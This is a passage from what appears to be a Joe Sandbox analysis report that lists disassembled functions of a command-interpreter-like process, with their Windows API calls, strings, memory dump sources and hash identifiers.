                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EE31CE71E402198BCB65DF28CD9DABA73A5AB94320F1401A8E806972C0DE71CE05BB70
                                                                                                                                                                                                                                                                                                                                                      Function 00F051E8 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 109COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • _wcsnicmp.MSVCRT ref: 00F05295
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EF727B: __iob_func.MSVCRT ref: 00EF7280
                                                                                                                                                                                                                                                                                                                                                      • fprintf.MSVCRT ref: 00F05215
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: __iob_func_wcsnicmpfprintf
                                                                                                                                                                                                                                                                                                                                                      • String ID: CMD Internal Error %s$%s$Null environment
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1828771275-2781220306
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 4d3856257f9add4d0fba05ef776422c4fd7d6268cbf0480e04298138a31bf1d0
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: b9aa504305a72207b95e9dafb2fa781e83c918fc85da0079523c7042b914357f
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4d3856257f9add4d0fba05ef776422c4fd7d6268cbf0480e04298138a31bf1d0
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5D313032E00619DBDF38DBA59C45A6FB7A5DF54B10B15042DEC0AB32C1EAB05E01FB55
                                                                                                                                                                                                                                                                                                                                                      Function 00F09FF8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00F0A034
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEE3F0: memset.MSVCRT ref: 00EEE455
                                                                                                                                                                                                                                                                                                                                                      • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,-00000209,00000000,?,-00000209,00000400,L#,00000400), ref: 00F0A078
                                                                                                                                                                                                                                                                                                                                                      • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00F0A0AA
                                                                                                                                                                                                                                                                                                                                                      • ??_V@YAXPAX@Z.MSVCRT(00000000,-00000209,00000400,L#,00000400), ref: 00F0A0C2
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: memset$DriveFullNamePathType
                                                                                                                                                                                                                                                                                                                                                      • String ID: L#
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3442494845-2643830878
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 67c0fcfd26a342de5a55a720ec980d0fa36d1f9a7d0d00494ffef79d04fd855f
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 6ccad7b6cceb5097ad020daa53979c8344a362057024d2ed399fe1dcf42e8dd2
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 67c0fcfd26a342de5a55a720ec980d0fa36d1f9a7d0d00494ffef79d04fd855f
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 91213771E0021E9BDB24DFA9DD859BFBBF8EF44354F040069A505E3141E634DE44DA52
                                                                                                                                                                                                                                                                                                                                                      Function 00EEB3C1 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 74COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEAB7F: iswspace.MSVCRT ref: 00EEAB8D
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEAB7F: wcschr.MSVCRT ref: 00EEAB9E
                                                                                                                                                                                                                                                                                                                                                      • wcschr.MSVCRT ref: 00EEB3FC
                                                                                                                                                                                                                                                                                                                                                      • wcschr.MSVCRT ref: 00EEB40E
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: wcschr$iswspace
                                                                                                                                                                                                                                                                                                                                                      • String ID: &<|>$+: $=,;
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3458554142-2256444845
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 08a3c7b32616ec3574e1963bad35af41ca36c9d8ce6d2b6a3efe7e0a0bc9e36b
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: c48f39b0b0b2a660e655bafb7dfb06075dfd3ab2c0b4e40da8d55c18fd0ad106
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 08a3c7b32616ec3574e1963bad35af41ca36c9d8ce6d2b6a3efe7e0a0bc9e36b
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7B112731A0019DA6C7349B2784415BFB7EAEFA5758B28102AE4C0B7390F7725C01E211
                                                                                                                                                                                                                                                                                                                                                      Function 00EEFCE9 Relevance: 7.8, APIs: 5, Instructions: 297COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00EEFD3A
                                                                                                                                                                                                                                                                                                                                                      • wcsspn.MSVCRT ref: 00EEFF18
                                                                                                                                                                                                                                                                                                                                                      • ??_V@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,)",00000000,-00000105,?,00000000,00000000), ref: 00EF000F
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EF1CD5: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,?,00000000,00000000,?,?,?,00EE80F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00EF1D3A
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EF1CD5: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,00EE80F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00EF1D44
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EF1CD5: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,?,00000000,?,00EE80F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00EF1D57
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EF1CD5: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00EE80F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00EF1D61
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: ErrorMode$FullNamePathmemsetwcsspn
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1535828850-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 6f01357136c7dfc5247c0c477185a298948a20394694035b83987f29bc9d69f7
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 97b2df9b47439265ae80ffa7ef4b1e5f457f273a76903de13f9161bb6e898494
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6f01357136c7dfc5247c0c477185a298948a20394694035b83987f29bc9d69f7
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6BC18475A00259CFDB24DF19C850BA9B7B6FF44314F5591AED509A73A1EB30AD81CF40
                                                                                                                                                                                                                                                                                                                                                      Function 00EE5190 Relevance: 7.6, APIs: 5, Instructions: 138COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: memset$_setjmp3
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 4215035025-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 391194a03a71e6e3ec7e61ae0c2845fddf2f0d686e93dc70f8d18c8f739a0962
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 059a0c8e2930c808d9a7e1d3abf3774dec92805b286e6a09bab208c59c97d0d6
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 391194a03a71e6e3ec7e61ae0c2845fddf2f0d686e93dc70f8d18c8f739a0962
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C5518572E0166D9BCB24CB56DC94AEEBBB4FB44348F145099E609F3151DB309E84CF61
                                                                                                                                                                                                                                                                                                                                                      Function 00F095F2 Relevance: 7.6, APIs: 5, Instructions: 114COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00F09631
                                                                                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00F0964F
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEE3F0: memset.MSVCRT ref: 00EEE455
                                                                                                                                                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00F096FD
                                                                                                                                                                                                                                                                                                                                                      • ??_V@YAXPAX@Z.MSVCRT(00000000,-00000209,?,?,?,?,00000000,?), ref: 00F0971B
                                                                                                                                                                                                                                                                                                                                                      • ??_V@YAXPAX@Z.MSVCRT(00000000,-00000209,?,?,?,?,00000000,?), ref: 00F09733
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: memset$_wcsicmp
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1670951261-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 0111e795a6d57f00898edc23ff534c3ddd95e349ec12961d8e865fd5be8c6b14
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: cd4d2e25c591dcf6653f32996318b89554bb411bc4a85440e71d53e63c8873f3
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0111e795a6d57f00898edc23ff534c3ddd95e349ec12961d8e865fd5be8c6b14
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B941A472E1421D9BDB24DBA5DCD5BAEB7B8EF44354F0000A9E905E3182EB74DE80DB61
                                                                                                                                                                                                                                                                                                                                                      Function 00F094E0 Relevance: 7.6, APIs: 5, Instructions: 102fileCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • _get_osfhandle.MSVCRT ref: 00F09527
                                                                                                                                                                                                                                                                                                                                                      • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00F0952F
                                                                                                                                                                                                                                                                                                                                                      • _get_osfhandle.MSVCRT ref: 00F095B5
                                                                                                                                                                                                                                                                                                                                                      • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00F095BD
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00F08C50: longjmp.MSVCRT(00F20A70,00000001,l ,00EE5E68,?,?,?,?,00000000), ref: 00F08CC4
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00F08C50: memset.MSVCRT ref: 00F08D1D
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00F08C50: memset.MSVCRT ref: 00F08D45
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00F08C50: memset.MSVCRT ref: 00F08D6D
                                                                                                                                                                                                                                                                                                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00F095CC
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEA16C: _close.MSVCRT ref: 00EEA19B
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: memset$File_get_osfhandle$ErrorLastPointerRead_closelongjmp
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 288106245-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: f925dbec8525c523a10c1cbf8c553832542037650db2b5cfa0e3e845498bec37
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: a5b7a0de3cc0e1f82a4af9e9226b20c23ca46671a60781324a6f7d92519195d8
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f925dbec8525c523a10c1cbf8c553832542037650db2b5cfa0e3e845498bec37
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 35319272E04108AFEF29EB75DC49BBE77A9EB44320F148129E502D71C2EAB4DD41BB50
                                                                                                                                                                                                                                                                                                                                                      Function 00EF4CA0 Relevance: 7.6, APIs: 5, Instructions: 98fileCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • _get_osfhandle.MSVCRT ref: 00EF4CC2
                                                                                                                                                                                                                                                                                                                                                      • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00F08FB3,?,00000000,?,?,?,?,?,?,?,00000000,?,00000021,00000000,?), ref: 00EF4CCA
                                                                                                                                                                                                                                                                                                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00F00BFC
                                                                                                                                                                                                                                                                                                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00F00C48
                                                                                                                                                                                                                                                                                                                                                      • DeleteFileW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 00F00C71
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: ErrorFileLast$DeleteRead_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3588551418-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 5e5832c598d5e5543c426b36278419d723e840bbb832b0f6914c70ea8d585022
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 0785a5db64350f44b98e8b9e8b875232ac64fc7c664c8da6fe5ea2e2f0af9f85
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5e5832c598d5e5543c426b36278419d723e840bbb832b0f6914c70ea8d585022
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7C31BFB1A0010DAFEB28DF25D845ABF77A9EF84314B259429E902E32D1DF359C41EB21
                                                                                                                                                                                                                                                                                                                                                      Function 00EEE272 Relevance: 7.6, APIs: 5, Instructions: 64COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • _get_osfhandle.MSVCRT ref: 00EEE29B
                                                                                                                                                                                                                                                                                                                                                      • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00EEE2A3
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: FilePointer_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1013686580-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 4fc38c51519e2b81fb888093c17a80f2d8df32ad7ca68dd66f2910cfc0f2d7a0
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 628d4f36068f595fa4f39161f0202485bbdfa456d0154a858a9b3fbde6f175d9
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4fc38c51519e2b81fb888093c17a80f2d8df32ad7ca68dd66f2910cfc0f2d7a0
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 79110631208108EFD3346FA4EC4EFA57B96EB08761F356015F305BA1E1EB619C41EA54
                                                                                                                                                                                                                                                                                                                                                      Function 00F08550 Relevance: 7.6, APIs: 5, Instructions: 63COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEDD98: _get_osfhandle.MSVCRT ref: 00EEDDA3
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEDD98: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00EFC050), ref: 00EEDDAD
                                                                                                                                                                                                                                                                                                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5), ref: 00F08571
                                                                                                                                                                                                                                                                                                                                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?), ref: 00F0857E
                                                                                                                                                                                                                                                                                                                                                      • ScrollConsoleScreenBufferW.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,00000000,?,?), ref: 00F085C7
                                                                                                                                                                                                                                                                                                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,00000000), ref: 00F085D5
                                                                                                                                                                                                                                                                                                                                                      • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000), ref: 00F085DC
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: Console$BufferHandleScreen$CursorFileInfoPositionScrollType_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3008996577-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 7a226e482bf4d69cd3c7cb23d0bf6c6ac1b97290592a48027fc6ee11e10d2049
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 91ce51f3e93917e2ceb521b5e61f730496c690679befce7458043d979ce556b2
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7a226e482bf4d69cd3c7cb23d0bf6c6ac1b97290592a48027fc6ee11e10d2049
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BF113A3590024D9BCB14DFF49C05AEEB7B9AF0C720F10551AE515F7190EA348906DB6A
                                                                                                                                                                                                                                                                                                                                                      Function 00EF70F5 Relevance: 7.6, APIs: 5, Instructions: 50timethreadCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • GetSystemTimeAsFileTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(00000000), ref: 00EF7122
                                                                                                                                                                                                                                                                                                                                                      • GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00EF7131
                                                                                                                                                                                                                                                                                                                                                      • GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00EF713A
                                                                                                                                                                                                                                                                                                                                                      • GetTickCount.API-MS-WIN-CORE-SYSINFO-L1-1-0 ref: 00EF7143
                                                                                                                                                                                                                                                                                                                                                      • QueryPerformanceCounter.API-MS-WIN-CORE-PROFILE-L1-1-0(?), ref: 00EF7158
